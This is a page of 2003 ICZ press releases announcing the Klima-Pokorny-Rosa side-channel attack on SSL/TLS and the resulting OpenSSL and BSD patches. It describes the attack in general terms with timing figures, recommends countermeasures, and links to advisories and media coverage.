Klima-Pokorny-Rosa
attack
(1) Press
release ICZ a.s., March 18, 2003
(2) Technical
enclosure of the press release
(3) Press
release ICZ a.s., March 21, 2003
http://www.i.cz/en/onas/tisk7.html
Press Release, Prague, 18.3.2003
Prague, March 18, 2003. The leading Czech cryptologists Vlastimil Klíma
and Tomáš Rosa, both working for ICZ a. s., and a colleague of theirs
Ondřej Pokorný have revealed and immediately suggested a solution to a
major security bug in the encrypted Internet communication.
The weakness identified by the cryptologists makes it possible to attack the
SSL/TLS (Secure Sockets Layer and Transport Layer Security) protocols used as a
cryptographic protection of a majority of electronic transactions, such as
on-line purchases and e-banking, and, in some cases, a secured transmission of
e-mails as well.
An attack on these protocols, as described by the team of Czech cryptologists,
can break through the protection completely and decrypt protected
communication. This means for clients using applications relying on SSL/TLS
protocols that an attacker is able to retrieve their credit card numbers,
sensitive information about their bank accounts and misuse confidential data
from their e-mails.
Client and provider security
In every transmission of information protected by the SSL/TLS protocols, there
is just one subject referred to as "server" (typically a service
provider, such as an e-shop, an e-bank, or a server with a email box) and just
one subject referred to as "client" (typically a buyer, an owner of a
bank account, or a receiver of incoming e-mails).
The aim of the attack is to decrypt the encrypted communication between the
client and the server. The attack is based on what is referred to as "side
channels" (a new trend in cryptanalysis) through which the attacker gets
access to sensitive information from the service provider (the server) without
any participation of the user (the client). The sensitive information is
received step by step on the background of standard connections between the
attacker and the server. This method is based on mathematic algorithms. This is
why it is not the users who should adopt any measures aimed at increasing the
level of protection. Urgent attention should thus be paid by the administrators
of those servers on which the error may occur. Cryptologists from ICZ found out
that out of a randomly selected sample of several hundreds of Internet servers
using the protocols concerned, as many as two thirds were vulnerable to the
attack.
To eliminate the error by the service providers' applying a security patch, the
Czech cryptologists have suggested several countermeasures in their report
which are fully compatible with the applications currently used by the clients.
This is why the clients will not encounter any difficulties related to the
shift to a safer version of the SSL/TLS protocols.
Since this security bug concerns the most widely used protocols protecting the
transmission of information via the Internet, the identification of the error
and in particular the preparation of a detailed methodology on how to remove
the error is another significant Czech contribution to the Internet security.
For further details see the cryptologic research report at http://eprint.iacr.org/2003/052/
or at ICZ web site at http://www.i.cz.
Technical enclosure:
What exactly does an attacker do?
Typically, the attacker's primary target is to decrypt intercepted confidential
communications between the client and the server. This is why we have chosen
the following example to demonstrate the importance of the attack discovery.
In the first step, the attacker intercepts and stores encrypted communication
between the client and the server. Due to the variety of environments in which
information is transmitted via the Internet, including air transmission,
interception of any communication is generally considered maybe not too easy
for an amateur but definitely possible for an experienced attacker.
In the second step, the attacker compiles his own requests based on the
intercepted encrypted transaction using a mathematic algorithm. Just like an
"ordinary" client, he sends these requests to the server on which the
transaction concerned occurred. The server responds to every such request, providing
the attacker with "side information". By putting together a great
many pieces of such side information, the hacker receives enough data to be
able to compute the value of the main symmetrical key of the connection called
a premaster secret. Then he/she simply decrypts the intercepted communication.
How difficult is an attack?
Except for the interception of an encrypted transaction, an attack like this
places no special requirements on the attacker's computers or any other devices
and equipment used. An intruder can easily accomplish this using a standard
office computer with a fast and stable Internet connection. So it is only the
time spent on the second step that makes the attack somewhat difficult. The
amount of time spent depends on the number of requests that an attacker must
send and receive responses to.
A typical Internet server using a 1024-bit RSA key will succumb to the attack
after less than 13.34 million requests in half the cases. The processing speed
equalled to 67.7 requests per second in our testing environment. This means
that every second attack would finish within 55 hours. However, there was one
attack in our tests that only lasted 14 hours and 23 minutes.
In practice, an attacker will be more likely to spread this load both in time and
in space to minimize the risk of being revealed. The only thing that an
attacker needs is to receive the necessary number of responses from the server,
and so his attack does not need to take place continually or from a single
location.
In practice, the attack could be launched over various arbitrarily long time
intervals spread over an arbitrarily long period from any number of computers.
The only limiting factor is the server that has to respond to the requests
received from all the computers involved. Spread over a long period of time,
the attack may take considerably more time, but again, due to the current
validity period of credit cards, a hacker can wait for the decryption of a
credit card number even for months.
Practical vulnerability and countermeasures
With respect to the purpose of the attacks, any vulnerability of the servers,
if identified, must be considered a relatively serious security threat. On the
other hand, it is not necessary to get into panic whenever an electronic
transaction takes place because an administrator of the attacked server with
the necessary experience and tools should be able to identify an attack like
this and stop it by blocking the direction from which the attack is coming.
In case of a sophisticated distributed attack, it is advisable to cancel the
current RSA key of the server and generate a new one. This will prevent the
attacker from finishing his/her attack. It should, however, be pointed out that
the risk of a successful attack is very high for poorly administered servers.
Therefore, increased attention should be paid to the administration of servers
until the necessary security patches are available.
The countermeasures described above are administrative and technical and should
be efficient enough until the countermeasures suggested by cryptologists are
adopted. These are very easy to apply and highly efficient. They are described
in the technical report prepared by the authors and consist in updating the
server software.
http://www.i.cz/en/onas/tisk8.html
Press Release, Prague, 21.3.2003
Open SSL Group, which produces the most frequently used software for the
implementation of SSL/TLS protocols, has released a patch to fix a weakness
that allowed a successful attack on the most frequently used method of
encrypting communications on the Internet.
The hole was discovered several days ago by leading Czech cryptologists
Vlastimil Klíma and Tomáš Rosa, both working for ICZ a. s., and a colleague of
theirs Ondřej Pokorný, who also suggested a protection method.
A successful hacker attack on servers with this weakness would compromise data
security, on-line purchases, electronic banking, and in certain cases secured
e-mail transmissions. The cryptologists say that programming this type of
attack poses no great problem to experienced hackers and roughly two thirds of
SSL/TLS servers on the Internet have this weakness.
Administrators of SSL/TLS servers can now download this publicly accessible
patch to security programs, which will stop hackers from exploiting the
weakness. Patches have also been released for the OpenBSD and FreeBSD operating
systems, which are freely available as Linux, but are more security-oriented.
Administrators of banking, commercial and other SSL/TLS servers unable to use
the patches (those using different software, for example) should first
familiarize themselves with the countermeasures recommended by the
cryptologists or follow the administrative and technical instructions available
at the Internet addresses below.
More details:
First press release with technical annex: http://www.i.cz/onas/tisk14.html
OpenSSL homepage: http://www.openssl.org/news/secadv_20030319.txt
OpenSSL patch: http://www.openssl.org/source/repos.html
OpenBSD homepage: http://www.openbsd.org/
OpenBSD patch: http://www.openbsd.org/kpr
FreeBSD homepage: http://www.freebsd.org/
FreeBSD patch: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:06.openssl.asc
Research report: http://eprint.iacr.org/2003/052/
Czech Press Agenture ČTK , March 23
Czech television ČT1, News, April 21, 19:15,
Radio Praha ČRo 7, March 23
TV Markíza
Hospodářské noviny, 24.3., str. 23,
České noviny, 22.4.,
Právo, 22.4., str.3,
etc.
25.3. David Wagner, cryptologist, University of California Berkeley:
......But then, the recent Klima-Pokorny-Rosa paper shows how even just a tiny crack can lead to subtle, totally unexpected attacks. Who would have thought that SSL's version rollback check (two bytes in the input to the modular exponentiation) could enable such a devastating attack? Not me. ......
http://www.openssl.org/news/secadv_20030319.txt
http://www.theregister.co.uk/content/55/29868.html
http://www.securityfocus.com/advisories/5151
http://linuxtoday.com/security/
http://www.bsdtoday.com/2003/March/Security804.html
http://sources.redhat.com/ml/cygwin-announce/2003-03/msg00030.html
http://www.security.nnov.ru/search/document.asp?docid=4245
http://www.apacheweek.com/issues/03-03-21
http://www.help-desk.ca/
http://www.krypta.cz/articles.php?ID=247
http://lists.netsys.com/pipermail/full-disclosure/2003-March/004570.html
http://www.twm.cz/
http://www.iss.net/security_center/static/11586.php
http://www.root.cz/clanek/1561
http://www.linuxsecurity.com/advisories/engarde_advisory-3009.html
http://www.swnet.cz/index.php?ID=18877
http://pes.eunet.cz/clanky/2003/03/29218_0_0_0.html
http://www.ipsec.pl/
http://www.altlinux.com/index.php?module=sisyphus&package=openssl
http://www.netsys.com/cgi-bin/displaynews?a=530
http://www.deadly.org/
http://openwiki.com/ow.asp?BSD%2FAggregation
http://www.uinc.ru/scripts/news/news.pl?list=0
http://neworder.box.sk/showme.php3?id=7804
http://telebot.dk/security/all_exploits.asp
http://www.zive.cz/h/Uzivatel/Ar.asp?ARI=109956&CAI=2114
http://www.ceskenoviny.cz/view-id.php4?id=20030323E01270
http://www.technet.cz/zprava.html?zprava=21861
http://www.sme.sk/clanok.asp?vyd=20030324&cl=850380
http://www.einstein.cz/aktuality/?id=61
http://www.inside.cz/index.php?ID=383
http://www.svetsiti.cz/
http://www.reboot.cz/info.phtml
http://www.istrategie.cz/detail.htm?id=35772